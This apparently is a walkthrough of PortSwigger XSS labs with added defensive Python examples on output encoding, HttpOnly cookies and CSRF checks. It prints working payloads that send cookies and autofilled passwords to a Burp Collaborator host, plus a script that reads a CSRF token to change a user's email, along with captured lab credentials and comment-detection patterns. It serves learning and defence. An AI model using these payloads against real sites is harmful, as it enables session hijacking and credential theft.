Cross-site scripting | XSS explained (PortSwigger solve)

Reflected XSS lab

For this lab we open a post and make a comment while intercepting all the requests in the background with Burp Suite. Then we send the request to Repeater and prepare our payload:

<script>document.location='http://yourID.burpcollaborator.net/?'+document.cookie</script>

We send it from Repeater and wait for the response in Burp Collaborator. Also, select the payload in Burp and press CTRL+U to URL-encode it. The captured cookies arrive in the Collaborator interaction:

secret=avJbuCyJJiBnI7NFZJ4sbbdOXdKAb4Py; session=4TWOZsQYlS5PASECvxhQPUONxdZ5qi6l

Lab 3: Exploiting cross-site scripting to capture passwords

The comment contains a fake login form, so the browser's password autofill populates it, and the values are then read with JavaScript:

<input required="" type="username" name="username">
<input required="" type="password" name="password">

document.getElementsByName("username")[0].value
document.getElementsByName("password")[0].value

First attempt, sending both values to Collaborator as soon as the script runs:

<input required="" type="username" name="username"><input required="" type="password" name="password"><script>document.location='your-burpC-ID.burpcollaborator.net/?'+document.getElementsByName("username")[0].value+'&'+document.getElementsByName("password")[0].value</script>

But it arrives without any information. This happens because at the moment document.location is set, the autocomplete has not yet been carried out, so we use the onchange attribute instead, which only runs after the field's value has changed:

<input required="" type="username" name="username"><input required="" type="password" name="password" onchange="document.location='http://YOUR-ID.burpcollaborator.net/?'+document.getElementsByName('username')[0].value+'&'+document.getElementsByName('password')[0].value">

The Collaborator request now contains the credentials:

administrator:ef6gbovly0a77qvxul8i
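The two labs above succeed because the comment is written into the page as raw HTML and because the session cookie is readable from JavaScript. The following Python example, added here and not part of the original post or of PortSwigger's lab code, shows the server-side side of that: it renders a comment unsafely and safely, runs Python's own HTML parser over the result to see which elements and event handlers a browser would actually create from it, and builds a Set-Cookie header that keeps the session out of document.cookie. The comment bodies, the cookie value and the helper names (render_comment_unsafe, render_comment_safe, active_content, session_cookie_header, readable_from_script) are all constructed for this example.

```python
import html
from html.parser import HTMLParser

# Constructed comment bodies modelled on the two payloads from the walkthrough.
COOKIE_THEFT_COMMENT = (
    "<script>document.location='http://yourID.burpcollaborator.net/?'"
    "+document.cookie</script>"
)
PASSWORD_CAPTURE_COMMENT = (
    '<input required="" type="username" name="username">'
    '<input required="" type="password" name="password" '
    "onchange=\"document.location='http://YOUR-ID.burpcollaborator.net/?'"
    "+document.getElementsByName('password')[0].value\">"
)


def render_comment_unsafe(comment: str) -> str:
    """Vulnerable rendering: the comment is concatenated straight into the page."""
    return f'<section class="comment"><p>{comment}</p></section>'


def render_comment_safe(comment: str) -> str:
    """Hardened rendering: HTML metacharacters are entity-encoded, so the browser
    displays the payload as text instead of creating elements from it."""
    return f'<section class="comment"><p>{html.escape(comment, quote=True)}</p></section>'


class ElementCollector(HTMLParser):
    """Records every element and on* event-handler attribute the parser produces,
    approximating what a browser would instantiate from the markup."""

    def __init__(self) -> None:
        super().__init__()
        self.elements: list[str] = []
        self.handlers: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.elements.append(tag)
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.handlers.append(f"{tag}@{name.lower()}")


def active_content(rendered_html: str) -> tuple[list[str], list[str]]:
    """Elements and event handlers that came from the comment; the wrapper's own
    <section> and <p> are excluded."""
    collector = ElementCollector()
    collector.feed(rendered_html)
    collector.close()
    return sorted(set(collector.elements) - {"section", "p"}), collector.handlers


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value for the session: HttpOnly keeps it out of document.cookie,
    so the cookie-stealing payload has nothing to exfiltrate even if it runs."""
    return f"session={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"


def readable_from_script(set_cookie: str) -> bool:
    """Approximates document.cookie visibility: only cookies without HttpOnly."""
    attributes = {part.strip().lower() for part in set_cookie.split(";")[1:]}
    return "httponly" not in attributes


if __name__ == "__main__":
    for label, comment in (("cookie theft", COOKIE_THEFT_COMMENT),
                           ("password capture", PASSWORD_CAPTURE_COMMENT)):
        print(label, "unsafe:", active_content(render_comment_unsafe(comment)))
        print(label, "safe:  ", active_content(render_comment_safe(comment)))
    print("session cookie readable by JS:",
          readable_from_script(session_cookie_header("example-session-id")))
```

Output encoding is the fix that covers both labs: once the comment is escaped, neither the script element nor the input with its onchange handler exists in the DOM. HttpOnly only closes the cookie-theft path; it does nothing against the password-capture payload, which never touches the cookie, so it is a second layer rather than a substitute for encoding.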

Lab: Exploiting XSS to perform CSRF

The email-change request carries a csrf parameter, so the injected script has to read the current token from the page before it can submit the change:

POST /email/change-email HTTP/1.1
Host: ac411fe71f8b856f80352cd100b300fe.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: https://ac411fe71f8b856f80352cd100b300fe.web-security-academy.net
DNT: 1
Connection: close
Referer: https://ac411fe71f8b856f80352cd100b300fe.web-security-academy.net/email
Cookie: session=aFgfuzayL8jK1xA5jr3j6Z1fQvH6Kbsv
Upgrade-Insecure-Requests: 1

email=a%40a.a&csrf=6f8A1jOKIzioIeAGRZayu2KCRH2q0mTf

The payload posted in a comment fetches /email, extracts the token from the form and reuses it:

<script>
// load the page that contains the current csrf token
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get', '/email', true);
req.send();
function handleResponse() {
  // pull the token out of the form and send the change-email request with it
  var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
  var changeReq = new XMLHttpRequest();
  changeReq.open('post', '/email/change-email', true);
  changeReq.send('csrf=' + token + '&email=a@a.a');
}
</script>
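The point of this lab from the defender's side is that the usual CSRF defences are satisfied by a request the page's own script makes: the XHR runs in the site's origin, so the Origin and Referer headers match and the script can read a valid token. The Python example below, added here and not part of the original post or of PortSwigger's lab code, models that check with the headers and values from the request above, contrasts it with a request forged from a third-party page, and adds a small rule set for flagging script-bearing comment submissions. The request dictionaries, the SESSION_TOKENS table, the comment bodies and the function names (passes_csrf_checks, suspicious_comment) are constructed for this example.

```python
import re
from http.cookies import SimpleCookie
from urllib.parse import parse_qs

LAB_HOST = "ac411fe71f8b856f80352cd100b300fe.web-security-academy.net"

# The change-email request as the victim's browser issues it when the injected
# script runs: same Origin and Referer, the victim's own session cookie, and the
# csrf token the script just read from /email. Header values follow the request
# in the walkthrough; the dict layout is constructed for this example.
SCRIPT_DRIVEN_REQUEST = {
    "headers": {
        "Host": LAB_HOST,
        "Origin": f"https://{LAB_HOST}",
        "Referer": f"https://{LAB_HOST}/email",
        "Cookie": "session=aFgfuzayL8jK1xA5jr3j6Z1fQvH6Kbsv",
    },
    "body": "csrf=6f8A1jOKIzioIeAGRZayu2KCRH2q0mTf&email=a%40a.a",
}

# The same request forged from a third-party page (classic CSRF): the browser
# sets a foreign Origin and the attacker cannot know the token. Constructed.
CROSS_SITE_REQUEST = {
    "headers": {
        "Host": LAB_HOST,
        "Origin": "https://attacker.example",
        "Referer": "https://attacker.example/",
        "Cookie": "session=aFgfuzayL8jK1xA5jr3j6Z1fQvH6Kbsv",
    },
    "body": "csrf=guess&email=a%40a.a",
}

# Server-side table of the token bound to each session (constructed).
SESSION_TOKENS = {"aFgfuzayL8jK1xA5jr3j6Z1fQvH6Kbsv": "6f8A1jOKIzioIeAGRZayu2KCRH2q0mTf"}


def passes_csrf_checks(request: dict) -> bool:
    """Origin must match the site and the submitted csrf token must be the one
    bound to the session. A same-origin XHR launched by XSS satisfies both."""
    headers = request["headers"]
    if headers.get("Origin") != f"https://{headers['Host']}":
        return False
    jar = SimpleCookie()
    jar.load(headers.get("Cookie", ""))
    session = jar["session"].value if "session" in jar else None
    token = parse_qs(request["body"]).get("csrf", [None])[0]
    return token is not None and SESSION_TOKENS.get(session) == token


# Detection for the comment form that carried the payload: these rules flag
# markup or script that a plain-text comment has no reason to contain.
COMMENT_RULES = [
    ("script_tag", re.compile(r"<\s*script\b", re.I)),
    ("event_handler", re.compile(r"<[^>]*\bon[a-z]+\s*=", re.I)),
    ("xhr_or_fetch", re.compile(r"\b(XMLHttpRequest|fetch\s*\()", re.I)),
    ("dom_access", re.compile(r"document\.(cookie|location)", re.I)),
]


def suspicious_comment(text: str) -> list[str]:
    """Names of the rules that match; an empty list means nothing script-like."""
    return [name for name, pattern in COMMENT_RULES if pattern.search(text)]


# Constructed comment bodies: the lab payload (abridged) and a harmless one.
CSRF_VIA_XSS_COMMENT = (
    "<script>var req = new XMLHttpRequest(); req.onload = handleResponse; "
    "req.open('get','/email',true); req.send();</script>"
)
BENIGN_COMMENT = "Great write-up, thanks for the explanation!"

if __name__ == "__main__":
    print("script-driven request passes CSRF checks:", passes_csrf_checks(SCRIPT_DRIVEN_REQUEST))
    print("cross-site forgery passes CSRF checks:  ", passes_csrf_checks(CROSS_SITE_REQUEST))
    print("lab comment flags:", suspicious_comment(CSRF_VIA_XSS_COMMENT))
    print("benign comment flags:", suspicious_comment(BENIGN_COMMENT))
```

The token and Origin checks stop the cross-site forgery but pass the script-driven request, which is exactly what the lab demonstrates: a CSRF token is not a mitigation for XSS. The effective fix is to stop the comment from being rendered as HTML in the first place (output encoding, as in the earlier labs), with a Content-Security-Policy that disallows inline script as a second layer; the comment rules are a detection aid for spotting such submissions in logs, not a substitute for either.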

vijay nariyal